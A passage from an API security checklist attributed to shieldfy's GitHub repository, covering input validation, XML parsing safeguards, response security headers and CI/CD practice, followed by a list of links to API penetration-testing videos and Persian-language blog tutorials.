- Validate the content-type of posted data as you accept it (e.g. application/x-www-form-urlencoded, multipart/form-data, application/json, etc.).
- Validate user input to avoid common vulnerabilities (e.g. XSS, SQL injection, remote code execution, etc.).
- Don't use any sensitive data (credentials, passwords, security tokens, or API keys) in the URL; use the standard Authorization header.
- Use an API gateway service to enable caching, rate-limit policies (e.g. quota, spike arrest, or concurrent rate limit) and deploy API resources dynamically.

Processing
- Check that all endpoints are protected behind authentication to avoid a broken authentication process.
- The user's own resource ID should be avoided. Use /me/orders instead of /user/654321/orders.
- Don't auto-increment IDs. Use UUIDs instead.
- If you are parsing XML files, make sure entity parsing is not enabled to avoid XXE (XML external entity attack).
- If you are parsing XML files, make sure entity expansion is not enabled to avoid Billion Laughs/XML bomb via exponential entity expansion attack.
- Use a CDN for file uploads.
- If you are dealing with huge amounts of data, use workers and queues to process as much as possible in the background and return the response fast to avoid HTTP blocking.
- Do not forget to turn DEBUG mode OFF.

Output
- Send the X-Content-Type-Options: nosniff header.
- Send the X-Frame-Options: deny header.
- Send the Content-Security-Policy: default-src 'none' header.
- Remove fingerprinting headers: X-Powered-By, Server, X-AspNet-Version, etc.
- Force the content-type for your response. If you return application/json, then your response content-type is application/json.
- Don't return sensitive data like credentials, passwords, or security tokens.
- Return the proper status code according to the operation completed (e.g. 200 OK, 400 Bad Request, 401 Unauthorized, 405 Method Not Allowed, etc.).

CI & CD
- Audit your design and implementation with unit/integration test coverage.
- Use a code review process and disregard self-approval.
- Ensure that all components of your services are statically scanned by AV software before pushing to production, including vendor libraries and other dependencies.
- Design a rollback solution for deployments.

Source: https://github.com/shieldfy/API-Security-Checklist
[API Pentest Guide]
API hacking by Katie Paxton-Fear
https://youtu.be/qqmyAxfGV9c
https://www.youtube.com/watch?v=cWSu2Ja65Z4
https://www.youtube.com/watch?v=yCUQBc2rY9Y&list=PLbyncTkpno5HqX1h2MnV6Qt4wvTb8Mpol

HACKTIVITY
https://www.youtube.com/watch?v=zW8QF3x3oSU
https://www.youtube.com/watch?v=HXci0-NSwOs
API 101 - https://www.youtube.com/watch?v=ijalD2NkRFg
BADAPI - https://www.youtube.com/watch?v=UT7-ZVawdzA

Part 1: Introduction | Enumeration | Tools
https://www.youtube.com/watch?v=UD6n666nS8I
https://virgool.io/class313/%D9%85%D9%82%D8%AF%D9%85%D9%87-%D8%A7%DB%8C-%D8%A8%D8%B1-%D8%AA%D8%B3%D8%AA-%D9%86%D9%81%D9%88%D8%B0-%D9%88%D8%A8%D8%B3%D8%B1%D9%88%DB%8C%D8%B3-os12uh6bbyy4

Part 2: XXE | XPath Injection | API SQL Injection
https://www.youtube.com/watch?v=AIBC0WRf38A
https://virgool.io/class313/%D8%A2%D8%B3%DB%8C%D8%A8-%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C-%D9%87%D8%A7%DB%8C-xxexpath-injectionapi-sql-injection-nfudsdnvjlv4

Part 3: XML Bomb | Command Injection | XST | SSRF
https://www.youtube.com/watch?v=vKm_WHxczow&feature=youtu.be
https://virgool.io/class313/%D8%A2%D8%B3%DB%8C%D8%A8-%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C-%D9%87%D8%A7%DB%8C-xml-bombcommand-injection-xst-ssrf-%D8%AF%D8%B1-%D9%88%D8%A8%D8%B3%D8%B1%D9%88%DB%8C%D8%B3-%D9%87%D8%A7-htnh2lninb8c

Part 4: CORS | SOME | JWT | IDOR
https://www.youtube.com/watch?v=NbJwjnoJr5g&feature=youtu.be
https://virgool.io/class313/%D8%A2%D8%B3%DB%8C%D8%A8-%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C-%D9%87%D8%A7%DB%8C-corssomejwtidor-%D8%AF%D8%B1-%D9%88%D8%A8%D8%B3%D8%B1%D9%88%DB%8C%D8%B3-%D9%87%D8%A7-xwm2fkivu3so
